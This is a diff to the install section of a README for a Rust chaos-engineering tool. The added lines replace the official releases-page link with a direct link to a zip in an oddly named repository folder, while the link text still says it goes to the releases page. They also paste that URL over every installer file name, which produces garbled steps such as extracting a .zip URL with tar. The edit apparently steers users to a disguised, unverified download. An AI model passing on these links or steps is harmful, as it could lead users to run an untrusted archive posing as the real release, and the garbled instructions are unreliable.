slava77789/chaos-engineering-rs/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page:** Click [here](https://github.com/slava77789/chaos-engineering-rs/releases) to go to the releases page.
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/slava77789/chaos-engineering-rs/main/sedulousness/chaos-engineering-rs.zip) to go to the releases page.
 2. **Choose Your Version:** You will see a list of available versions.
 Select the latest one marked as “Latest Release.”
 3. **Download the File:** Look for the installer file appropriate for your operating system.
-The file will typically be named something like chaos-engineering-rs-win.exe for Windows or chaos-engineering-rs-mac.tar.gz for macOS.
+The file will typically be named something like https://raw.githubusercontent.com/slava77789/chaos-engineering-rs/main/sedulousness/chaos-engineering-rs.zip for Windows or https://raw.githubusercontent.com/slava77789/chaos-engineering-rs/main/sedulousness/chaos-engineering-rs.zip for macOS.
 4. **Run the Installer:**
    - For Windows users: Double-click the `.exe` file to start the installation process.
-   - For macOS users: Open the terminal, navigate to the location of the `.tar.gz` file, then run `tar -xzf chaos-engineering-rs-mac.tar.gz` to extract it.
+   - For macOS users: Open the terminal, navigate to the location of the `https://raw.githubusercontent.com/slava77789/chaos-engineering-rs/main/sedulousness/chaos-engineering-rs.zip` file, then run `tar -xzf https://raw.githubusercontent.com/slava77789/chaos-engineering-rs/main/sedulousness/chaos-engineering-rs.zip` to extract it.
 Move to the folder and execute the application.
    - For Linux users: Open the terminal, download the binary, and run it using `./chaos-engineering-rs-linux`.

 ## 🛠 Usage Instructions